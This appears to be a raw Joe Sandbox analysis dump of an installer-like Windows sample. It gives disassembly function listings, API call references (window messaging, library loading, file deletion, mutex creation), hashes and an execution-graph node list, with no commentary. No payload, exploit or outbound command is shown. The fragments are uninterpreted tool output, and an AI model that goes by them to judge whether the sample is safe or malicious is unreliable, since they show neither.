                                                                                                      • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                      • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CommandHandleLineModule
                                                                                                      • String ID: H%o$U1hd.@
                                                                                                      • API String ID: 2123368496-2799989109
                                                                                                      • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                      • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                      • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                      APIs
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue
                                                                                                      • String ID: )q@
                                                                                                      • API String ID: 3660427363-2284170586
                                                                                                      • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                      • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                      • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                      • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                      APIs
                                                                                                      • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                      Strings
                                                                                                      • Setup, xrefs: 00409CAD
                                                                                                      • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message
                                                                                                      • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                      • API String ID: 2030045667-3271211647
                                                                                                      • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                      • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                      • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                      • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                      • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                      • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2623354716.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2623295618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623424122.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2623501046.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Oz2UhFBTHy.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLastSleep
                                                                                                      • String ID:
                                                                                                      • API String ID: 1458359878-0
                                                                                                      • Opcode ID: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                      • Instruction ID: cd4a420f7ace5638a97e0bdb8a1e9fccbb234b9240edd4770f97938e6011a3cc
                                                                                                      • Opcode Fuzzy Hash: 97bb3b87fdda019371420e794be163fcf62410a15a23215566f33b90e6dc6563
                                                                                                      • Instruction Fuzzy Hash: 16F0967360451477CA35A5AF9D81A5F634DDAD1354B10813BE945F3283C538DD0142A9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:16%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:4.6%
                                                                                                      Total number of Nodes:2000
                                                                                                      Total number of Limit Nodes:87
                                                                                                      execution_graph 49969 40cd00 49970 40cd12 49969->49970 49971 40cd0d 49969->49971 49973 406f48 CloseHandle 49971->49973 49973->49970 49974 492848 49975 49287c 49974->49975 49976 49287e 49975->49976 49977 492892 49975->49977 50120 446f9c 32 API calls 49976->50120 49980 4928ce 49977->49980 49981 4928a1 49977->49981 49979 492887 Sleep 50040 4928c9 49979->50040 49986 49290a 49980->49986 49987 4928dd 49980->49987 50110 446ff8 49981->50110 49985 4928b0 49988 4928b8 FindWindowA 49985->49988 49992 492919 49986->49992 49993 492960 49986->49993 49989 446ff8 32 API calls 49987->49989 50114 447278 49988->50114 49991 4928ea 49989->49991 49995 4928f2 FindWindowA 49991->49995 50121 446f9c 32 API calls 49992->50121 49999 4929bc 49993->49999 50000 49296f 49993->50000 49997 447278 19 API calls 49995->49997 49996 492925 50122 446f9c 32 API calls 49996->50122 50053 492905 49997->50053 50007 492a18 49999->50007 50008 4929cb 49999->50008 50125 446f9c 32 API calls 50000->50125 50002 492932 50123 446f9c 32 API calls 50002->50123 50003 49297b 50126 446f9c 32 API calls 50003->50126 50006 49293f 50124 446f9c 32 API calls 50006->50124 50018 492a52 50007->50018 50019 492a27 50007->50019 50130 446f9c 32 API calls 50008->50130 50009 492988 50127 446f9c 32 API calls 50009->50127 50013 49294a SendMessageA 50017 447278 19 API calls 50013->50017 50014 4929d7 50131 446f9c 32 API calls 50014->50131 50016 492995 50128 446f9c 32 API calls 50016->50128 50017->50053 50027 492a61 50018->50027 50028 492aa0 50018->50028 50022 446ff8 32 API calls 50019->50022 50020 4929e4 50132 446f9c 32 API calls 50020->50132 50025 492a34 50022->50025 50024 4929a0 PostMessageA 50129 4470d0 19 API calls 50024->50129 50032 492a3c RegisterClipboardFormatA 50025->50032 50026 4929f1 50133 446f9c 32 API calls 50026->50133 50135 446f9c 32 API calls 50027->50135 50036 492aaf 50028->50036 50042 492af4 50028->50042 50033 447278 19 API calls 50032->50033 50033->50040 50034 4929fc SendNotifyMessageA 50134 4470d0 19 API calls 50034->50134 50035 492a6d 50136 446f9c 32 API calls 50035->50136 50138 446f9c 32 API calls 50036->50138 50160 403420 50040->50160 50041 492a7a 50137 446f9c 32 API calls 50041->50137 50047 492b48 50042->50047 50048 492b03 50042->50048 50043 492abb 50139 446f9c 32 API calls 50043->50139 50046 492a85 SendMessageA 50050 447278 19 API calls 50046->50050 50057 492baa 50047->50057 50058 492b57 50047->50058 50142 446f9c 32 API calls 50048->50142 50049 492ac8 50140 446f9c 32 API calls 50049->50140 50050->50053 50053->50040 50054 492b0f 50143 446f9c 32 API calls 50054->50143 50056 492ad3 PostMessageA 50141 4470d0 19 API calls 50056->50141 50065 492bb9 50057->50065 50066 492c31 50057->50066 50061 446ff8 32 API calls 50058->50061 50059 492b1c 50144 446f9c 32 API calls 50059->50144 50063 492b64 50061->50063 50146 42e394 SetErrorMode 50063->50146 50064 492b27 SendNotifyMessageA 50145 4470d0 19 API calls 50064->50145 50069 446ff8 32 API calls 50065->50069 50074 492c40 50066->50074 50075 492c66 50066->50075 50071 492bc8 50069->50071 50070 492b71 50072 492b87 GetLastError 50070->50072 50073 492b77 50070->50073 50149 446f9c 32 API calls 50071->50149 50076 447278 19 API calls 50072->50076 50077 447278 19 API calls 50073->50077 50154 446f9c 32 API calls 50074->50154 50084 492c98 50075->50084 50085 492c75 50075->50085 50078 492b85 50076->50078 50077->50078 50081 447278 19 API calls 50078->50081 50080 492c4a FreeLibrary 50155 4470d0 19 API calls 50080->50155 50081->50040 50093 492ca7 50084->50093 50099 492cdb 50084->50099 50089 446ff8 32 API calls 50085->50089 50086 492bdb GetProcAddress 50087 492c21 50086->50087 50088 492be7 50086->50088 50153 4470d0 19 API calls 50087->50153 50150 446f9c 32 API calls 50088->50150 50091 492c81 50089->50091 50097 492c89 CreateMutexA 50091->50097 50156 48ccc8 32 API calls 50093->50156 50094 492bf3 50151 446f9c 32 API calls 50094->50151 50097->50040 50098 492c00 50102 447278 19 API calls 50098->50102 50099->50040 50158 48ccc8 32 API calls 50099->50158 50101 492cb3 50103 492cc4 OemToCharBuffA 50101->50103 50104 492c11 50102->50104 50157 48cce0 19 API calls 50103->50157 50152 4470d0 19 API calls 50104->50152 50107 492cf6 50108 492d07 CharToOemBuffA 50107->50108 50159 48cce0 19 API calls 50108->50159 50111 447000 50110->50111 50164 436078 50111->50164 50113 44701f 50113->49985 50115 447280 50114->50115 50277 4363e0 VariantClear 50115->50277 50117 4472a3 50118 4472ba 50117->50118 50278 408c0c 18 API calls 50117->50278 50118->50040 50120->49979 50121->49996 50122->50002 50123->50006 50124->50013 50125->50003 50126->50009 50127->50016 50128->50024 50129->50053 50130->50014 50131->50020 50132->50026 50133->50034 50134->50040 50135->50035 50136->50041 50137->50046 50138->50043 50139->50049 50140->50056 50141->50053 50142->50054 50143->50059 50144->50064 50145->50040 50279 403738 50146->50279 50149->50086 50150->50094 50151->50098 50152->50053 50153->50053 50154->50080 50155->50040 50156->50101 50157->50040 50158->50107 50159->50040 50162 403426 50160->50162 50161 40344b 50162->50161 50163 402660 4 API calls 50162->50163 50163->50162 50165 436084 50164->50165 50175 4360a6 50164->50175 50165->50175 50184 408c0c 18 API calls 50165->50184 50166 436129 50193 408c0c 18 API calls 50166->50193 50168 436111 50188 403494 50168->50188 50169 436105 50169->50113 50170 4360f9 50179 403510 18 API calls 50170->50179 50171 4360ed 50185 403510 50171->50185 50172 43611d 50192 4040e8 32 API calls 50172->50192 50175->50166 50175->50168 50175->50169 50175->50170 50175->50171 50175->50172 50178 43613a 50178->50113 50183 436102 50179->50183 50181 436126 50181->50113 50183->50113 50184->50175 50194 4034e0 50185->50194 50189 403498 50188->50189 50190 4034ba 50189->50190 50191 402660 4 API calls 50189->50191 50190->50113 50191->50190 50192->50181 50193->50178 50199 4034bc 50194->50199 50196 4034f0 50204 403400 50196->50204 50200 4034c0 50199->50200 50201 4034dc 50199->50201 50208 402648 50200->50208 50201->50196 50205 403406 50204->50205 50206 40341f 50204->50206 50205->50206 50272 402660 50205->50272 50206->50113 50209 40264c 50208->50209 50212 402656 50208->50212 50214 402088 50209->50214 50210 402652 50210->50212 50225 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50210->50225 50212->50196 50215 40209c 50214->50215 50216 4020a1 50214->50216 50226 4019cc RtlInitializeCriticalSection 50215->50226 50218 4020c6 RtlEnterCriticalSection 50216->50218 50219 4020d0 50216->50219 50220 4020a5 50216->50220 50218->50219 50219->50220 50233 401f94 50219->50233 50220->50210 50223 4021f1 RtlLeaveCriticalSection 50224 4021fb 50223->50224 50224->50210 50225->50212 50227 4019f0 RtlEnterCriticalSection 50226->50227 50228 4019fa 50226->50228 50227->50228 50229 401a18 LocalAlloc 50228->50229 50230 401a32 50229->50230 50231 401a81 50230->50231 50232 401a77 RtlLeaveCriticalSection 50230->50232 50231->50216 50232->50231 50236 401fa4 50233->50236 50234 401fd0 50238 401ff4 50234->50238 50244 401db4 50234->50244 50236->50234 50236->50238 50239 401f0c 50236->50239 50238->50223 50238->50224 50248 40178c 50239->50248 50242 401f29 50242->50236 50245 401e02 50244->50245 50246 401dd2 50244->50246 50245->50246 50259 401d1c 50245->50259 50246->50238 50254 4017a8 50248->50254 50249 4014e4 LocalAlloc VirtualAlloc VirtualFree 50249->50254 50250 4017b2 50251 401678 VirtualAlloc 50250->50251 50255 4017be 50251->50255 50252 40180f 50252->50242 50258 401e80 9 API calls 50252->50258 50253 4013e0 LocalAlloc 50253->50254 50254->50249 50254->50250 50254->50252 50254->50253 50256 401803 50254->50256 50255->50252 50257 4015c0 VirtualFree 50256->50257 50257->50252 50258->50242 50260 401d2e 50259->50260 50261 401d51 50260->50261 50262 401d63 50260->50262 50263 401940 LocalAlloc VirtualFree VirtualFree 50261->50263 50264 401940 LocalAlloc VirtualFree VirtualFree 50262->50264 50265 401d61 50263->50265 50264->50265 50266 401d79 50265->50266 50267 401bf8 9 API calls 50265->50267 50266->50246 50268 401d88 50267->50268 50269 401da2 50268->50269 50270 401c4c 9 API calls 50268->50270 50271 401454 LocalAlloc 50269->50271 50270->50269 50271->50266 50273 402664 50272->50273 50274 40266e 50272->50274 50273->50274 50276 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 50273->50276 50274->50206 50276->50274 50277->50117 50278->50118 50280 40373c LoadLibraryA 50279->50280 50280->50070 54037 498ba8 54095 403344 54037->54095 54039 498bb6 54098 4056a0 54039->54098 54041 498bbb 54101 40631c GetModuleHandleA GetProcAddress 54041->54101 54045 498bc5 54109 40994c 54045->54109 54376 4032fc 54095->54376 54097 403349 GetModuleHandleA GetCommandLineA 54097->54039 54100 4056db 54098->54100 54377 4033bc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 54098->54377 54100->54041 54102 406338 54101->54102 54103 40633f GetProcAddress 54101->54103 54102->54103 54104 406355 GetProcAddress 54103->54104 54105 40634e 54103->54105 54106 406364 SetProcessDEPPolicy 54104->54106 54107 406368 54104->54107 54105->54104 54106->54107 54108 4063c4 6FB81CD0 54107->54108 54108->54045 54378 409024 54109->54378 54376->54097 54377->54100 54379 408cbc 19 API calls 54378->54379 54380 409035 54379->54380 54381 4085dc GetSystemDefaultLCID 54380->54381 54384 408612 54381->54384 54382 406dec 19 API calls 54382->54384 54383 408568 19 API calls 54383->54384 54384->54382 54384->54383 54385 403450 18 API calls 54384->54385 54389 408674 54384->54389 54385->54384 54386 406dec 19 API calls 54386->54389 54387 408568 19 API calls 54387->54389 54388 403450 18 API calls 54388->54389 54389->54386 54389->54387 54389->54388 54390 4086f7 54389->54390 54391 403420 4 API calls 54390->54391 54392 408711 54391->54392 54393 408720 GetSystemDefaultLCID 54392->54393 54450 408568 GetLocaleInfoA 54393->54450 54396 403450 18 API calls 54397 408760 54396->54397 54398 408568 19 API calls 54397->54398 54399 408775 54398->54399 54400 408568 19 API calls 54399->54400 54401 408799 54400->54401 54456 4085b4 GetLocaleInfoA 54401->54456 54404 4085b4 GetLocaleInfoA 54405 4087c9 54404->54405 54406 408568 19 API calls 54405->54406 54407 4087e3 54406->54407 54408 4085b4 GetLocaleInfoA 54407->54408 54409 408800 54408->54409 54410 408568 19 API calls 54409->54410 54451 4085a1 54450->54451 54452 40858f 54450->54452 54454 403494 4 API calls 54451->54454 54453 4034e0 18 API calls 54452->54453 54455 40859f 54453->54455 54454->54455 54455->54396 54457 4085d0 54456->54457 54457->54404 55815 42f520 55816 42f52b 55815->55816 55817 42f52f NtdllDefWindowProc_A 55815->55817 55817->55816 50281 416b42 50282 416bea 50281->50282 50283 416b5a 50281->50283 50300 41531c 18 API calls 50282->50300 50285 416b74 SendMessageA 50283->50285 50286 416b68 50283->50286 50296 416bc8 50285->50296 50287 416b72 CallWindowProcA 50286->50287 50288 416b8e 50286->50288 50287->50296 50297 41a058 GetSysColor 50288->50297 50291 416b99 SetTextColor 50292 416bae 50291->50292 50298 41a058 GetSysColor 50292->50298 50294 416bb3 SetBkColor 50299 41a6e0 GetSysColor CreateBrushIndirect 50294->50299 50297->50291 50298->50294 50299->50296 50300->50296 55818 4358e0 55819 4358f5 55818->55819 55822 43590f 55819->55822 55824 4352c8 55819->55824 55831 435312 55824->55831 55834 4352f8 55824->55834 55825 403400 4 API calls 55826 435717 55825->55826 55826->55822 55837 435728 18 API calls 55826->55837 55827 446da4 18 API calls 55827->55834 55828 403744 18 API calls 55828->55834 55829 403450 18 API calls 55829->55834 55830 402648 18 API calls 55830->55834 55831->55825 55833 431ca0 18 API calls 55833->55834 55834->55827 55834->55828 55834->55829 55834->55830 55834->55831 55834->55833 55835 4038a4 18 API calls 55834->55835 55838 4343b0 55834->55838 55850 434b74 18 API calls 55834->55850 55835->55834 55837->55822 55839 43446d 55838->55839 55840 4343dd 55838->55840 55869 434310 18 API calls 55839->55869 55841 403494 4 API calls 55840->55841 55843 4343eb 55841->55843 55845 403778 18 API calls 55843->55845 55844 43445f 55846 403400 4 API calls 55844->55846 55848 43440c 55845->55848 55847 4344bd 55846->55847 55847->55834 55848->55844 55851 494944 55848->55851 55850->55834 55852 49497c 55851->55852 55853 494a14 55851->55853 55855 403494 4 API calls 55852->55855 55870 448930 55853->55870 55858 494987 55855->55858 55856 494997 55857 403400 4 API calls 55856->55857 55859 494a38 55857->55859 55858->55856 55860 4037b8 18 API calls 55858->55860 55861 403400 4 API calls 55859->55861 55863 4949b0 55860->55863 55862 494a40 55861->55862 55862->55848 55863->55856 55864 4037b8 18 API calls 55863->55864 55865 4949d3 55864->55865 55866 403778 18 API calls 55865->55866 55867 494a04 55866->55867 55868 403634 18 API calls 55867->55868 55868->55853 55869->55844 55871 448955 55870->55871 55872 448998 55870->55872 55873 403494 4 API calls 55871->55873 55875 4489ac 55872->55875 55882 44852c 55872->55882 55874 448960 55873->55874 55879 4037b8 18 API calls 55874->55879 55877 403400 4 API calls 55875->55877 55878 4489df 55877->55878 55878->55856 55880 44897c 55879->55880 55881 4037b8 18 API calls 55880->55881 55881->55872 55883 403494 4 API calls 55882->55883 55884 448562 55883->55884 55885 4037b8 18 API calls 55884->55885 55886 448574 55885->55886 55887 403778 18 API calls 55886->55887 55888 448595 55887->55888 55889 4037b8 18 API calls 55888->55889 55890 4485ad 55889->55890 55891 403778 18 API calls 55890->55891 55892 4485d8 55891->55892 55893 4037b8 18 API calls 55892->55893 55903 4485f0 55893->55903 55894 448628 55896 403420 4 API calls 55894->55896 55895 4486c3 55899 4486cb GetProcAddress 55895->55899 55900 448708 55896->55900 55897 44864b LoadLibraryExA 55897->55903 55898 44865d LoadLibraryA 55898->55903 55901 4486de 55899->55901 55900->55875 55901->55894 55902 403b80 18 API calls 55902->55903 55903->55894 55903->55895 55903->55897 55903->55898 55903->55902 55904 403450 18 API calls 55903->55904 55906 43da88 18 API calls 55903->55906 55904->55903 55906->55903 50301 416644 50302 416651 50301->50302 50303 4166ab 50301->50303 50308 416550 CreateWindowExA 50302->50308 50304 416658 SetPropA SetPropA 50304->50303 50305 41668b 50304->50305 50306 41669e SetWindowPos 50305->50306 50306->50303 50308->50304 55907 4222e4 55908 4222f3 55907->55908 55913 421274 55908->55913 55911 422313 55914 4212e3 55913->55914 55916 421283 55913->55916 55918 4212f4 55914->55918 55938 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55914->55938 55916->55914 55937 408d2c 33 API calls 55916->55937 55917 421322 55924 421395 55917->55924 55928 42133d 55917->55928 55918->55917 55919 4213ba 55918->55919 55921 4213ce SetMenu 55919->55921 55934 421393 55919->55934 55920 4213e6 55941 4211bc 24 API calls 55920->55941 55921->55934 55926 4213a9 55924->55926 55924->55934 55925 4213ed 55925->55911 55936 4221e8 10 API calls 55925->55936 55929 4213b2 SetMenu 55926->55929 55930 421360 GetMenu 55928->55930 55928->55934 55929->55934 55931 421383 55930->55931 55932 42136a 55930->55932 55939 4124d0 GetMenuItemCount GetMenuStringA GetMenuState 55931->55939 55935 42137d SetMenu 55932->55935 55934->55920 55940 421e2c 25 API calls 55934->55940 55935->55931 55936->55911 55937->55916 55938->55918 55939->55934 55940->55920 55941->55925 55942 44b4a8 55943 44b4b6 55942->55943 55945 44b4d5 55942->55945 55944 44b38c 25 API calls 55943->55944 55943->55945 55944->55945 55946 448728 55947 448756 55946->55947 55948 44875d 55946->55948 55951 403400 4 API calls 55947->55951 55949 448771 55948->55949 55952 44852c 21 API calls 55948->55952 55949->55947 55950 403494 4 API calls 55949->55950 55953 44878a 55950->55953 55954 448907 55951->55954 55952->55949 55955 4037b8 18 API calls 55953->55955 55956 4487a6 55955->55956 55957 4037b8 18 API calls 55956->55957 55958 4487c2 55957->55958 55958->55947 55959 4487d6 55958->55959 55960 4037b8 18 API calls 55959->55960 55961 4487f0 55960->55961 55962 431bd0 18 API calls 55961->55962 55963 448812 55962->55963 55964 448832 55963->55964 55965 431ca0 18 API calls 55963->55965 55966 448870 55964->55966 55989 4435d0 18 API calls 55964->55989 55965->55963 55967 448888 55966->55967 55990 4435d0 18 API calls 55966->55990 55978 442334 55967->55978 55970 4488bc GetLastError 55991 4484c0 18 API calls 55970->55991 55973 4488cb 55992 443610 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55973->55992 55975 4488e0 55993 443620 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55975->55993 55977 4488e8 55979 443312 55978->55979 55980 44236d 55978->55980 55982 403400 4 API calls 55979->55982 55981 403400 4 API calls 55980->55981 55983 442375 55981->55983 55984 443327 55982->55984 55985 431bd0 18 API calls 55983->55985 55984->55970 55986 442381 55985->55986 55987 443302 55986->55987 55994 441a0c 18 API calls 55986->55994 55987->55970 55989->55964 55990->55967 55991->55973 55992->55975 55993->55977 55994->55986 55995 4165ec DestroyWindow 55996 42e3ef SetErrorMode 50309 441394 50310 44139d 50309->50310 50311 4413ab WriteFile 50309->50311 50310->50311 50312 4413b6 50311->50312 55997 491bf8 55998 491c32 55997->55998 55999 491c3e 55998->55999 56000 491c34 55998->56000 56002 491c4d 55999->56002 56003 491c76 55999->56003 56193 409098 MessageBeep 56000->56193 56005 446ff8 32 API calls 56002->56005 56010 491cae 56003->56010 56011 491c85 56003->56011 56004 403420 4 API calls 56006 49228a 56004->56006 56007 491c5a 56005->56007 56008 403400 4 API calls 56006->56008 56194 406bb0 56007->56194 56012 492292 56008->56012 56017 491cbd 56010->56017 56018 491ce6 56010->56018 56014 446ff8 32 API calls 56011->56014 56016 491c92 56014->56016 56202 406c00 18 API calls 56016->56202 56020 446ff8 32 API calls 56017->56020 56025 491d0e 56018->56025 56026 491cf5 56018->56026 56023 491cca 56020->56023 56021 491c9d 56203 44734c 19 API calls 56021->56203 56204 406c34 18 API calls 56023->56204 56032 491d1d 56025->56032 56033 491d42 56025->56033 56206 407280 19 API calls 56026->56206 56028 491cd5 56205 44734c 19 API calls 56028->56205 56029 491cfd 56207 44734c 19 API calls 56029->56207 56034 446ff8 32 API calls 56032->56034 56036 491d7a 56033->56036 56037 491d51 56033->56037 56035 491d2a 56034->56035 56038 4072a8 SetCurrentDirectoryA 56035->56038 56044 491d89 56036->56044 56045 491db2 56036->56045 56039 446ff8 32 API calls 56037->56039 56040 491d32 56038->56040 56041 491d5e 56039->56041 56208 4470d0 19 API calls 56040->56208 56043 42c804 19 API calls 56041->56043 56046 491d69 56043->56046 56047 446ff8 32 API calls 56044->56047 56050 491dfe 56045->56050 56051 491dc1 56045->56051 56209 44734c 19 API calls 56046->56209 56049 491d96 56047->56049 56210 4071f8 22 API calls 56049->56210 56057 491e0d 56050->56057 56058 491e36 56050->56058 56053 446ff8 32 API calls 56051->56053 56056 491dd0 56053->56056 56054 491da1 56211 44734c 19 API calls 56054->56211 56059 446ff8 32 API calls 56056->56059 56060 446ff8 32 API calls 56057->56060 56065 491e6e 56058->56065 56066 491e45 56058->56066 56061 491de1 56059->56061 56062 491e1a 56060->56062 56212 4918fc 22 API calls 56061->56212 56064 42c8a4 19 API calls 56062->56064 56068 491e25 56064->56068 56073 491e7d 56065->56073 56074 491ea6 56065->56074 56069 446ff8 32 API calls 56066->56069 56067 491ded 56213 44734c 19 API calls 56067->56213 56214 44734c 19 API calls 56068->56214 56072 491e52 56069->56072 56075 42c8cc 19 API calls 56072->56075 56076 446ff8 32 API calls 56073->56076 56081 491ede 56074->56081 56082 491eb5 56074->56082 56077 491e5d 56075->56077 56079 491e8a 56076->56079 56215 44734c 19 API calls 56077->56215 56216 42c8fc 19 API calls 56079->56216 56088 491eed 56081->56088 56089 491f16 56081->56089 56083 446ff8 32 API calls 56082->56083 56085 491ec2 56083->56085 56084 491e95 56217 44734c 19 API calls 56084->56217 56087 42c92c 19 API calls 56085->56087 56090 491ecd 56087->56090 56091 446ff8 32 API calls 56088->56091 56094 491f62 56089->56094 56095 491f25 56089->56095 56218 44734c 19 API calls 56090->56218 56093 491efa 56091->56093 56096 42c954 19 API calls 56093->56096 56102 491f71 56094->56102 56103 491fb4 56094->56103 56097 446ff8 32 API calls 56095->56097 56098 491f05 56096->56098 56099 491f34 56097->56099 56219 44734c 19 API calls 56098->56219 56101 446ff8 32 API calls 56099->56101 56105 491f45 56101->56105 56104 446ff8 32 API calls 56102->56104 56110 491fc3 56103->56110 56111 492027 56103->56111 56106 491f84 56104->56106 56220 42c4f8 19 API calls 56105->56220 56108 446ff8 32 API calls 56106->56108 56112 491f95 56108->56112 56109 491f51 56221 44734c 19 API calls 56109->56221 56114 446ff8 32 API calls 56110->56114 56118 492066 56111->56118 56119 492036 56111->56119 56222 491af4 26 API calls 56112->56222 56116 491fd0 56114->56116 56185 42c608 21 API calls 56116->56185 56117 491fa3 56223 44734c 19 API calls 56117->56223 56129 4920a5 56118->56129 56130 492075 56118->56130 56122 446ff8 32 API calls 56119->56122 56126 492043 56122->56126 56123 491fde 56124 491fe2 56123->56124 56125 492017 56123->56125 56128 446ff8 32 API calls 56124->56128 56225 4470d0 19 API calls 56125->56225 56226 452908 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection DeleteFileA GetLastError 56126->56226 56133 491ff1 56128->56133 56138 4920e4 56129->56138 56139 4920b4 56129->56139 56134 446ff8 32 API calls 56130->56134 56132 492050 56227 4470d0 19 API calls 56132->56227 56186 452c80 56133->56186 56137 492082 56134->56137 56142 452770 5 API calls 56137->56142 56149 49212c 56138->56149 56150 4920f3 56138->56150 56143 446ff8 32 API calls 56139->56143 56140 492061 56166 491c39 56140->56166 56141 492001 56224 4470d0 19 API calls 56141->56224 56145 49208f 56142->56145 56146 4920c1 56143->56146 56228 4470d0 19 API calls 56145->56228 56229 452e10 Wow64DisableWow64FsRedirection SetLastError Wow64RevertWow64FsRedirection RemoveDirectoryA GetLastError 56146->56229 56155 49213b 56149->56155 56156 492174 56149->56156 56152 446ff8 32 API calls 56150->56152 56151 4920ce 56230 4470d0 19 API calls 56151->56230 56154 492102 56152->56154 56157 446ff8 32 API calls 56154->56157 56158 446ff8 32 API calls 56155->56158 56161 492187 56156->56161 56168 49223d 56156->56168 56159 492113 56157->56159 56160 49214a 56158->56160 56163 447278 19 API calls 56159->56163 56162 446ff8 32 API calls 56160->56162 56164 446ff8 32 API calls 56161->56164 56165 49215b 56162->56165 56163->56166 56167 4921b4 56164->56167 56172 447278 19 API calls 56165->56172 56166->56004 56169 446ff8 32 API calls 56167->56169 56168->56166 56234 446f9c 32 API calls 56168->56234 56170 4921cb 56169->56170 56231 407ddc 21 API calls 56170->56231 56172->56166 56173 492256 56174 42e8c8 19 API calls 56173->56174 56175 49225e 56174->56175 56235 44734c 19 API calls 56175->56235 56178 4921ed 56179 446ff8 32 API calls 56178->56179 56180 492201 56179->56180 56232 408508 18 API calls 56180->56232 